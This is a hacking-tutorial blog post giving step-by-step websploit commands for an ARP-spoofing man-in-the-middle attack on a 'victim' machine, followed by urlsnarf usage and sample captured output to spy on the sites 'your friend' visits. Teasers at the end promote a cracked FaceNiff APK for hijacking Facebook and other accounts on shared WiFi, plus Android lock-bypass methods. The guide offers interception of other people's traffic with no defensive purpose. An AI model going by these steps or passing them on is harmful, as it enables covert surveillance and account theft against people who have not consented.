Skip to main content

URLSnarf - Kali Linux Tool used to Sniffing in Network



Urlsnarf outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool.

Urlsnarf outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.).

URLSnarf - Kali Linux Tool used to Sniffing in Network

URLSnarf - Kali Linux Tool used to Sniffing in Network


MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.

Step 1: Need to install websploit in kali if not present.

root@kali:~# apt-get install websploit


Step 2: To Run the websploit

root@kali:~# websploit

Step 3: Next we need to list the modules with the websploit.

wsf > show modules


Step 4: Need to select network/mitm under Network modules.

wsf > use network/mitm
wsf:MITM > show options

Interface: Need to specify network adapter interface based on our network adapter.

set Interface eth0
set Interface wlan0

Router: Need to specify Router IP, can be found with the command route -n.

set Router (Gateway IP)

Target: Victim machine IP address, can be found with ipconfig for windows and ifconfig for Linux.

Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occurs after that sniffers will startup.

wsf:MITM > run

Step 6: Now go down to victim machine and start surfing, all the images would be captured by urlsnarf.


URLSnarf – Tool used to capture website links that your friend looking Online


Syntax

url snarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]

Example

akash@hackersTreeHouse:~$ sudo urlsnarf -i eth0 -v -p cap.pcap
url snarf: using cap.pcap [tcp port 80 or port 8080 or port 3128]
192.168.1.18 - - [16/Nov/2015:15:10:38 +0530] "GET http://192.168.1.6/img/for HTTP/1.1" - - "http://192.168.1.6/img/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
rc = -1
pcap_read_ex(): bogus savefile header

Protocols Vulnerable for Sniffing


HTTP: Sends passwords in clear text
TELNET: Transfer commands in plain text
SNMP: Sends passwords in clear text
POP: Sends passwords in clear text
FTP: Sends passwords in clear text
NNTP: Sends passwords in clear text
IMAP: Sends passwords in clear text

Here is Video Tutorial:


If you any doubt please don’t hesitate to leave a comment.

Also Read:


Popular posts from this blog

Download FaceNiff apk PRO (LATEST) 2017

What is Faceniff?FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to.It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK)It's kind of like Firesheep for android. Maybe a bit easier to use (and it works on WPA2!).
Supported services: (new coming soon) you can hack following account using this app: FaceBookTwitterYoutubeAmazonVKontakteTumblrMySpaceTuentiMeinVZ/StudiVZbloggerNasza-Klasa Download Faceniff apk 2017Download Faceniff apk PRO v2.4 [LATEST] 2017 Download Faceniff App Free Faceniff Apk Hack Facebook Account Using Faceniff 100% 2017
Faceniff apk Cracked [Latest version 2.4] for android
you can hack only 3 accounts at a time but with cracked faceniff apk, which you are going to download, you can hack unlimited accounts.
Faceniff apk Downloads 2017 Steps to Use:-
Download Latest version of cracked faceniff apk and Insta…

5 Things to do after installing kali linux 2017

5 Things to do after installing kali linux 2017 Edition
Kali linux is most famous OS made for Hackers and Security Researchers, many people learn kali linux and use to work as Computer Security Researcher or as a Hacker, but there is something you need to fix after installing your new kali linux.
Lets See what are Top 5 things you should do after installing kali linux, a new 2017 edition, things to do after installing kali linux first time is very basic and give you smooth and non-disturbing experience.
Things to do After Installing Kali Linux. 1. Fix Default Repository fix default repository should be our first task, open terminal and type below command and press enter
leafpad /etc/apt/sources.list
after that ,add the below lines in the file and save it.
## Regular repositories deb http://http.kali.org/kali kali main non-free contrib deb http://security.kali.org/kali-security kali/updates main contrib non-free ## Source repositories deb-src http://http.kali.org/kali kali main non-fr…

how to unlock android pattern lock without factory reset

how to unlock android pattern lock without factory reset

Hello There, Majority people own android phone now days and there are some or many like me who like to set lock screen(pattern/password/pin) but what if you forget your pattern/password or pin ? ofcourse there is option to unlock your device using google account but what if you also do not know about it? some of you will hard reset from recovery mode but that is not one good Solution it will wipe all of your important data and memories. so, in this article we mention first method which required ROOT and Custom Recovery like TWRP or CWM or Philz and in second method you need Pre-Enabled USB Debugging Mode in order to unlock android pattern lock without factory reset.
Lets move Further and see how to unlock android pattern lock without factory reset

Also Read: How to root almost any android smartphone

how to unlock android pattern lock without factory reset

Method 1 (Need ROOT with Custom Recovery)Requirements -
Any android phoneRo…